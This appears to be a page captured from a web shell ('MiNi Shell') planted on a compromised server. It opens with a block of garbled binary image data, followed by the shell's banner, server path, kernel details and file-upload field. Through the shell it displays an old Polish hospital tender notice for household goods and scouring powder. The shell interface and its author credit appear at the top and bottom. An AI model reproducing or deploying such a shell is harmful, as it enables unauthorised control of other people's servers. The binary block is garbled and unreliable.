JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121115/451154-N-2012.html

<p class="kh_header"><b>Wrocław: Sukcesywna dostawa: 
PAKIET NR 1 - DROBNYCH  ARTYKUŁÓW GOSPODARSTWA  DOMOWEGO 
PAKIET NR 2 - PROSZKU DO SZOROWANIA</b><br>
<b>Numer ogłoszenia: 451154 - 2012; data zamieszczenia: 15.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląskie Centrum Onkologii we Wrocławiu , pl. Hirszfelda 12, 53-413 Wrocław, woj. dolnośląskie, tel. 71 3689584, faks 71 36 89 583; 36 89 234.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dco.com.pl, www.przetargipubliczne.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.dco.com.pl,</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa: 
PAKIET NR 1 - DROBNYCH  ARTYKUŁÓW GOSPODARSTWA  DOMOWEGO 
PAKIET NR 2 - PROSZKU DO SZOROWANIA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywna dostawa: 
PAKIET NR 1 - DROBNYCH  ARTYKUŁÓW GOSPODARSTWA  DOMOWEGO 
PAKIET NR 2 - PROSZKU DO SZOROWANIA.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.72.00.00-5, 24.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu o udzielenie zamówienia publicznego jest wniesienie wadium w wysokości łącznie 1.100 zł ( jeden tysiąc sto zł), a dla poszczególnych zadań zgodnie z tabelą podaną poniżej:
Nr zadania	Wysokość wadium
1	1.000 zł
2	100 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia z art. 22 ustawy - załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia z art. 22 ustawy - załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia z art. 22 ustawy - załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia z art. 22 ustawy - załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykazanie zdolności finansowej zapewniającej wykonanie zamówienia tj. wykazanie posiadania ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę minimum:
Pakiet Nr 1 - 26.000,00 zł,
Pakiet Nr 2 -  2.800,00 zł.
W przypadku złożenia oferty na więcej niż jeden pakiet, kwotę ubezpieczenia należy zsumować.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Odpowiednie katalogi (zawierające numery katalogowe oferowanych produktów), foldery lub materiały źródłowe w czytelny i jasny sposób potwierdzające spełnianie parametrów techniczno-użytkowych opisanych przez Zamawiającego w załączniku nr 1 i 2 do SIWZ. Brak potwierdzenia parametrów wymaganych zostanie uznany za niespełnienie przez oferowany asortyment tychże parametrów i spowoduje odrzucenie oferty, chyba ze zachodzić będą przesłanki określone w art. 26 ust. 3 ustawy. W przypadku sporządzenia ww. dokumentów w języku obcym do oferty należy dołączyć dokument (y) wraz z tłumaczeniem na język polski. Zamawiający zastrzega sobie prawo do sprawdzenia wiarygodności podanych przez Wykonawcę parametrów we wszystkich dostępnych źródłach w tym również poprzez zwrócenie się o złożenie dodatkowych wyjaśnień przez Wykonawcę. 
2. Oświadczenie  potwierdzające, że oferowany sprzęt kuchenny posiada atesty i certyfikaty dopuszczające  do kontaktu z żywnością .
3. Dla pakietu 2 - karta charakterystyki (patrz pkt.3.2.2 z SIWZ)</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	W przypadku braku możliwości dostawy produktu objętego niniejszą umową z przyczyn niezależnych od Wykonawcy, Zamawiający dopuszcza zastąpienie jego innym produktem o innej nazwie handlowej i od innego producenta, z zastrzeżeniem, że musi on spełniać warunki określone w opisie przedmiotu zamówienia zawartego w SIWZ i  z zachowaniem ceny zawartej w ofercie wykonawcy.
2.	Zmiana opisana w ust 1 niniejszego paragrafu może nastąpić wyłącznie za zgodą Zamawiającego po uprzedniej pisemnej informacji Wykonawcy zawierającej okoliczności i przyczyny konieczności wprowadzenia zamiany i czasu jej trwania oraz po dostarczeniu wszelkich dokumentów wymaganych w SIWZ oraz próbki ( o ile było wymagane w SIWZ).
3.	Za obopólną zgodą stron, w przypadku nie wyczerpania wartości i asortymentu umowy przed jej wygaśnięciem może być ona przedłużona do momentu wykorzystania całej wartości i asortymentu poprzez wprowadzeniu aneksu do umowy.
1.	Wszelkie zmiany i uzupełnienia treści niniejszej umowy wymagają formy pisemnej w postaci aneksów do umowy pod rygorem nieważności z zastrzeżeniem zapisu § 4 ust. 4 niniejszej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dco.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląskie Centrum Onkologii we Wrocławiu, pl. Hirszfelda 12, 53-413 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.11.2012 godzina 10:00, miejsce: Dolnośląskim Centrum Onkologii, pl. Hirszfelda 12, 53-413 Wrocław, budynek H (Przychodnia), III piętro, pok. 312.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1 - DROBNE  ARTYKUŁY GOSPODARSTWA  DOMOWEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Deska do krojenia 	z tworzywa sztucznego, o rozm. 45x35 cm, +/-5cm koloru białego lub brązowego	szt.	5
2.	Dzbanek z pokrywką	ze stali nierdzewnej o poj. 2 l	 szt.	5
3.	Dzbanek z pokrywką 	plastikowy ok. 2 l z podziałką koloru białego lub bezbarwnego	szt	15
4.	Folia aluminiowa 	w rolce, długość 20 m do celów spożywczych	szt.	600
5.	Garnek z pokrywką 	ze stali nierdzewnej o poj. 2,5-3 l	szt.	5
6.	Garnek z pokrywką 	ze stali nierdzewnej o poj. 4,5-5 l	szt.	5
7.	Gąbka do mycia naczyń	z jednej strony ostra o rozmiarach 9 cm x 7 cm, +/- 1cm, opak. 5 szt.	opak	800
8.	Golarka plastykowa j. użytku	z dwoma nożykami, typu Polsilver 2 lub równoważne	szt.	6500
9.	Kosz do magla prostokątny o rozm. ok. Szer. 35cm x gł. 25cm x wys. 50cm	z tworzywa sztucznego, koloru dowolnego, bez pokrywy, ażurowy, z dwoma uchwytami, 	szt.	5
10.	Kosz do magla prostokątny  rozm. ok. Szer. 55cm, x gł. 30cm, x wys. 25cm	z tworzywa sztucznego, kolor dowolnego, bez pokrywy, ażurowy, z dwoma uchwytami, 	szt.	10
11.	Kosz prostokątny na śmieci z pedałem oraz wkładem	z tworzywa sztucznego, koloru białego, poj. 14-16 l, 	szt	40
12.	Kosz prostokątny na śmieci z pedałem oraz wkładem	z tworzywa sztucznego, koloru białego, poj. 25-30 l, 	szt.	30
13.	Kosz okrągły lub prostokątny na śmieci z pokrywą uchylną	z tworzywa sztucznego, koloru białego, poj. 8-10 l, 	szt.	10
14.	Kosz okrągły lub prostokątny na śmieci z pokrywą uchylną	z tworzywa sztucznego, koloru białego, poj. 13-15 l, 	szt.	10
15.	Kosz okrągły lub prostokątny na śmieci z pokrywą uchylną	z tworzywa sztucznego, koloru białego, poj. 25-30 l	szt.	15
16.	Koszyk z tworzywa sztucznego 	koloru białego, brązowy, ażurowy, o wymiarach ok. 20x10x5 cm	szt.	30
17.	Koszyk z tworzywa sztucznego	z tworzywa sztucznego, koloru białego, brązowy, ażurowy, o wymiarach ok. 25x16x8 cm	szt.	30
18.	Koszyk z tworzywa sztucznego 	z tworzywa sztucznego, koloru białego, brązowy, ażurowy, o wymiarach ok. 30x20x11 cm	szt.	30
19.	Koszyk z tworzywa sztucznego 	z tworzywa sztucznego, koloru białego, brązowy, ażurowy, o wymiarach ok. 36x25x15 cm	szt.	40
20.	Koszyk z tworzywa sztucznego 	z tworzywa sztucznego, koloru białego, brązowy, ażurowy, o wymiarach ok. 19x14x6,5 cm	szt.	30
21.	Koszyk z tworzywa sztucznego 	z tworzywa sztucznego, koloru białego, brązowy, ażurowy, o wymiarach ok. 25,5x19x6,5 cm	szt.	30
22.	Koszyk z tworzywa sztucznego 	z tworzywa sztucznego, koloru białego, brązowy, ażurowy, o wymiarach ok. 36x25x6,5 cm	szt.	20
23.	Koszyk z tworzywa sztucznego 	z tworzywa sztucznego, koloru białego, brązowy, ażurowy, o wymiarach ok. 40x30x6,5 cm	szt.	20
24.	Kubki bez ucha 	z porcelany 	szt.	50
25.	Kubki z tworzywa sztucznego, j. użytku	koloru dowolnego, o poj. 200 ml, do napojów gorących, opak. 100 szt.	opak.	450
26.	Lustra ścienne o wym. 40x60 cm		szt.	30
27.	Łyżeczki 	ze stali nierdzewnej	szt.	54
28.	Łyżka cedzakowa 	ze stali nierdzewnej o śr. 8-10 cm	szt.	5
29.	Łyżka czerpakowa do sosu	o poj. 150-200ml ze stali nierdzewnej	szt	5
30.	Łyżka czerpakowa do zupy	ze stali nierdzewnej, poj. 500 ml	szt.	5
31.	Łyżka stołowa	ze stali nierdzewnej	szt.	54
32.	Mata łazienkowa	z tworzywa sztucznego, koloru białego, antypoślizgowa o rozm.   80x50 cm +/- 5cm	szt.	15
33.	Miotła brzozowa 		szt.	500
34.	Miotła sorgo z kijem		szt	10
35.	Miska z tworzywa sztucznego	koloru dowolnego, śred. 40 cm z uchwytami, poj. ok. 15 l	szt.	15
36.	Nóż stołowy ząbkowany	ze stali nierdzewnej	szt.	54
37.	Nóż kuchenny 	ze stali nierdzewnej o dł. 23-25 cm	szt.	10
38.	Obrus ceratowy	koloru dowolnego, rozm. 140 cm x 100 cm	szt.	15
39.	Ociekacz na sztućce	z tworzywa sztucznego, koloru białego, ażurowy, z przegrodami	szt.	10
40.	Ociekacz z suszarką na naczynia	druciany, powlekany tworzywem sztucznym, do powieszenia na ścianie, koloru białego	szt.	10
41.	Pojemnik do przechowywania pieczywa 	z tworzywa sztucznego, uchylny, koloru białego lub brązowego, o rozm.  50-40cm x 27-30cm	szt.	5
42.	Pojemnik do żywności z pokrywą	z tworzywa sztucznego, koloru białego, z szczelną pokrywą,  poj. 1 l	szt.	10
43.	Pojemnik do żywności z pokrywą	z tworzywa sztucznego, koloru białego, z szczelną pokrywą,  poj. 2 l, wysoki, wymiary ok. 25cm x 12cm	szt.	10
44.	Pojemnik plastikowy 60-70 l	z tworzywa sztucznego z dwoma uchwytami koloru zielonego i brązowego	szt	4
45.	Rękawice gospodarcze - ochronne, flokowane	gumowane, bawełniana wyściółka - flock, antypoślizgowe, zastosowanie do prac porządkowych: w kuchni, mycia, prania, rozmiary od S do XL	para	600
46.	Suszarka na naczynia stojąca 	Suszarka do naczyń prostokątna o rozm. 30x40cm/+/- 5cm wykonana z tworzywa zawiera oddzielne przegródki na talerze, kubki i sztućce. Do kompletu tacka pod suszarkę.  	szt	10
47.	Szczoteczka do rąk  	oprawa z tworzywa sztucznego, jednostronna włosie sztuczne, o rozm. ok. 8 cm x 4 cm	szt	120
48.	Szczotka do mycia butelek 0,5 l	oprawa z tworzywa sztucznego, część robocza - włókno syntetyczne	szt	10
49.	Szczotka do szorowania podłóg + kij drewniany z gwintem	oprawa z tworzywa sztucznego, jednostronna, z otworem do wkręcania kija, szerokość 30 cm, na froncie drapak o dł. ok. 10 cm, szer. 0.7 cm	szt.	20
50.	Szczotka do WC + stojak	standardowa, tworzywo sztuczne, koloru białego	kpl.	120
51.	Szczotka typu Żelazko 	w oprawie z tworzywa sztucznego z włosiem sztucznym twardym o wym. 15 cm x 8 cm	szt.	70
52.	Szczotki do zamiatania, drewniana, + kij drewniany	włosie mieszane, wym. min. 30 cm, kij wkręcany o dł. ok. 120 cm	kpl.	50
53.	Szczypce do mięsa, sałaty	ze stali nierdzewnej	szt	10
54.	Ścierka do kurzu	nie zostawia smug i kłaczków, wymiar nie mniejszy niż 36 cm x 36 cm, kolor niebieski, 	szt.	2500
55.	Ścierka do podłogi	łatwo przyjmująca brud, higroskopijna, z włókniny koloru pomarańczowego o wymiarach 70cm x 50cm o gramaturze nie mniejszej niż 70 gr na m2	szt	3000
56.	Ścierka do szorowania - ostra	dwustronnie pętelkowana o wymiarach 17 cm x 13 cm +/- 3 cm, 	szt	1100
57.	Ścierka perforowana	ircha perforowana wykonana z tworzywa sztucznego do mycia wszystkich powierzchni, dostosowana na sucho i mokro, idealnie wchłania wodę i brud, rozm. 40 cm x 40 cm +/- 5cm, opak. 10 szt, 	opak	400
58.	Ścierka tetrowa	z bawełny 100%, wymiar nie mniejszy niż 80cm x 80cm wykończona obrębem	szt	1300
59.	Talerz deserowy	z porcelany 	szt.	150
60.	Talerz głęboki	z porcelany 	szt	200
61.	Talerz płaski	z porcelany 	szt.	100
62.	Termometr do lodówek	z tworzywa sztucznego	szt.	15
63.	Wiadro z pokrywą 	z tworzywa sztucznego, koloru dowolnego, okrągłe, poj. 10-12 l z miarką	szt.	20
64.	Widelce	ze stali nierdzewnej	szt.	102
65.	Zmiotka + szufelka	standardowa, tworzywo sztuczne, kolor dowolny	kpl.	60
66.	Żyletka do golenia	j. użytku, opak. 5 szt, ze stali nierdzewnej o platynowanych krawędziach.	szt. 	900.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.72.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2 - PROSZEK DO SZOROWANIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Proszek do szorowania z wybielaczem, 	czyści i usuwa zabrudzenia z urządzeń kuchennych oraz sanitarnych, drobnoziarnisty, pozostawia długotrwały zapach, czyści bez zarysowań poj. opak. 500 gr,	szt	800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com